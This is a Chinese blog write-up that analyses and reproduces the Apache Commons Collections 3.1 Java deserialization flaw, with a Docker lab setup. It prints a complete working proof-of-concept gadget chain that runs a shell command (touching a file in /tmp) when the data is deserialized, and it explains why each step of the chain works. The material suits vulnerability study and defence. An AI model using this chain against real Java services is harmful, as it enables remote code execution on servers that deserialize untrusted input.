如何进行Apache Commons Collections反序列化漏洞分析与复现

1.1 状态

完成漏洞挖掘条件分析、漏洞复现

1.2 漏洞分析

存在安全缺陷的版本:Apache Commons Collections3.2.1以下,【JDK版本:1.7.0_80】Apache Maven 3.6.3。

POC核心代码:

package com.patrilic.vul;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.map.TransformedMap;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map;public class EvalObject {public static void main(String[] args) throws Exception {Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),//                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"touch /tmp/CommonsCollections3.1"})};//将transformers数组存入ChaniedTransformer这个继承类Transformer transformerChain = new ChainedTransformer(transformers);//        transformerChain.transform(null);//创建Map并绑定transformerChainMap innerMap = new HashMap();innerMap.put("value", "value");Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);//        //触发漏洞//        Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();//        onlyElement.setValue("foobar");Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor cons = clazz.getDeclaredConstructor(Class.class,Map.class);cons.setAccessible(true);Object ins = cons.newInstance(java.lang.annotation.Retention.class,outerMap);//将ins序列化ByteArrayOutputStream exp = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(exp);oos.writeObject(ins);oos.flush();oos.close();//取出序列化的数据流进行反序列化,验证ByteArrayInputStream out = new ByteArrayInputStream(exp.toByteArray());ObjectInputStream ois = new ObjectInputStream(out);Object obj = (Object) ois.readObject();//    }//}}}

漏洞利用思路:

Transformer接口-实现类-InvokerTransformer(),可调用任何函数。

为实现 Runtime.getRuntime().exec(cmd),要多次调用 transformer 并将当前返回结果作为下次输入信息。

为调用 Runtime.getRuntime(),考虑 ConstantTransformer 类,它可直接将输入的参数作为输出。

ChainedTransformer 作为实现类,对于接收的Transformer 数组,采用自身的transform方法(参数是用户输入的)逐次处理Transformer数组对象,将其结果作为下次重复调用的输入参数。它的 transform()方法即可出触发漏洞。

为寻找反序列化途径,即读进来数据被反序列化执行,则反向寻找可触发ChainedTransformer 对象 .transform() 方法的途径。

HashMap类可以键值对方式存储数据,put(key,value)方法可存储数据。

TransformedMap类的功能是存储键值对并将其转换为transform objects,decorate()方法可创建键值对组,checkSetValue()方法会触发this.valueTransformer.transform()语句。依次反向寻找调用 checkSetValue()【1】,使 this.valueTransformer 为 ChainedTransformer 对象的途径【2】。

对于【2】,TransformedMap 类的静态方法 decorate()可达到目标。

对于【1】,AbstractInputCheckedMapDecorator 类 MapEntry 静态类的setValue方法会执行this.parent.checkSetValue(value),则接下来应使this.parent为TransformedMap对象【3】。

对于【3】,正向分析POC中此段代码:

Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();

研究可知,执行过程中多次在AbstractInputCheckedMapDecorator类中,将TransformedMap对象赋值给this.parent,返回Map.Entry对象,正好可以执行setValue()方法,触发漏洞。

为提升通用性,必须设法使得调用反序列化方法即触发漏洞,因此,考虑寻找类对象满足“重写反序列化readObject()且执行Map类对象变量的setValue(),同时此变量可被控制赋键值数据”。AnnotationInvocationHandler类满足此需求【它对Map类型的成员变量的每个条目均调用setValue()】。

Class.forName() 功能是加载类。

则再次分析,对于【1】,正向分析POC中核心代码:

Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor cons = clazz.getDeclaredConstructor(Class.class,Map.class);cons.setAccessible(true);Object ins = cons.newInstance(java.lang.annotation.Retention.class,outerMap);……Object obj = (Object) ois.readObject();

研究可知,执行过程会执行 MapEntry 静态类的 setValue 方法,且会执行entrySet 方法使得 this.parent=TransformedMap 对象,从而触发漏洞。

总的来说,正向的POC构造思路为:先构造 ChainedTransformer 对象,随后创建 Map 对象,再采用 TransformedMap 类实例将 ChainedTransformer 对象保存至 Map 类对象中,再通过反射方法获得经 Map 类对象初始化的AnnotationInvocationHandler 类实例,对其进行序列化。

1.3 docker复现

下载制作的docker镜像,用以下命令:

docker pull 296645429/apache-commons-collections-vulnerability-ubuntu:v1

设置局域网及容器ip、启动容器,例子:

(1)自定义网络

docker network create --subnet=192.168.10.1/24 testnet

(2)启动docker容器

docker run -p 8088:8088 -p 8081:8081 -it --name testt3 --hostname testt3 --network testnet --ip 10.10.10.100 ubuntuxxx:xxx /bin/bash

在容器【Apache-Commons-Collections】中,执行命令【java -jar commons-collections-3.1.jar】,则生成文件【CommonsCollections3.1】,如下图。

如何进行Apache Commons Collections反序列化漏洞分析与复现

关于如何进行Apache Commons Collections反序列化漏洞分析与复现问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

文章标题:如何进行Apache Commons Collections反序列化漏洞分析与复现,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/24058

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
上一篇 2022年9月8日 下午10:58
下一篇 2022年9月8日 下午10:58

相关推荐

  • 电脑0xc06d007e如何解决

    0xc06d007e修复方法: 方法一: 1、首先,如果我们是在开启一些图像处理软件或是播放器软件时才会出现问题。 2、那么就可能是因为电脑缺少了Windows Media player软件。 3、下载安装完成后,大家可以尝试再去打开软件,如果打不开的话再尝试下面的方法。 方法二: 1、如果上面的方…

    2022年9月18日
    1.6K00
  • windows KB4520010更新了哪些内容

    KB4520010主要更新方面: – 更新以提高使用 Internet Explorer 和 Microsoft Edge 时的安全性。 – 用于验证用户名和密码的更新。 – 用于存储和管理文件的更新。 KB4520010改进修补程序: 解决了安全公告 CVE-2…

    2022年9月1日
    30600
  • windows edge浏览器弹窗如何关闭

    edge浏览器关闭弹窗的方法: 1、在浏览器中点击右上角三个点,选择“设置”。 2、在左侧任务栏选择“隐私和安全性”。 3、下拉找到“安全性”将“阻止弹出窗口”的开关打开。 以上就是“windows edge浏览器弹窗如何关闭”这篇文章的所有内容,感谢各位的阅读!相信大家阅读完这篇文章都有很大的收获…

    2022年9月8日
    64200
  • C语言数据结构之栈与队列怎么相互实现

    一、用对列实现栈 题干要求: 细节分析:队列是先进先出; 要实现的栈是先进后出。 解题思路:假设:先用一个队列储存数据 N 个,然后将前 N-1 个数据导入到另一个队列, 此时,原始队列中仅剩一个,是最后剩的数据,便可将其导出,这便是一次后进先出。 细节点:每次导出数据时,都需要一个队列向另一个队列…

    2022年9月21日
    42900
  • mysql索引类型有哪些

    索引类型有:1、B-树索引,使表中的每一行都会在索引上有一个对应值;2、哈希索引,可根据索引列对应的哈希值的方法获取表的记录行;3、普通索引,允许在定义索引的列中插入重复值和空值;4、少数索引,可以避免数据出现重复;5、主键索引,是为主键字段创建的索引;6、空间索引,是对空间数据类型的字段建立的索引…

    2022年9月20日
    2.7K00
  • SQL注入类型是什么

    前言 SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。 可显注入 攻击者可以直接在当前界面内容中获取想要获得的内容。 报错注入 数据库查询返回结果并没有在页面中显示,但是应用程序将数据库报错信息打印到了页面中,所以攻击者可以构造数据库报错语句,从报错信息中…

    2022年9月6日
    66400
  • ae预合成了怎么分开

    ae预合成了还可以再分开吗: 1、ae预合成了可以再分开的。 2、首先右击选择需要拆解的预合成项。 3、然后点击下面的“打开”。 4、再点击“打开图层源”。 5、然后就可以看到预合成的内容展示在另一个中了。 “ae预合成了怎么分开”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可…

    2022年8月29日
    1.3K00
  • vlookup函数条件怎么填写

    vlookup函数条件填写方法 1、名列前茅个条件,选择需要查找的单元格,这里为“张三” 2、第二个条件,选中需要查找内容的列。 3、第三个条件,查看所需查找内容在第几列,这里工资在第三列,所以填“3” 4、第四个条件,如果要查找精确数据,就选择“0”,要模糊查找就用“1” 5、最后按下回车,就可以…

    2022年9月22日
    2.5K00
  • MySQL基于GTID主从搭建怎么实现

    一、用xtarbackup备份数据库 1.1 优势 使用xtarbackup来做主从的前期准备是因为xtarbackup备份数据和恢复数据都很快,特别适合数据量很大的数据库备份,而且它的安装非常的简单,使用也很简单….(巴拉巴拉,废话编不出来了)。 1.2 安装 具体版本根据自己的具体情…

    2022年8月27日
    37900
  • xp系统怎么安装

    xp系统安装方法: 1.下载的系统一般都是为ISO镜像格式。此时,我们需要对下载下来的Win xp系统镜像进行解压。 2.当win xp镜像文件解压完成后,会生成一个相应的雨林木风win xp 位系统文件夹。 3.现在我们打开文件夹,找到里面的“硬盘安装”程序,点击即可安装。 注:这里,我们也可以点…

    2022年9月1日
    48000
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部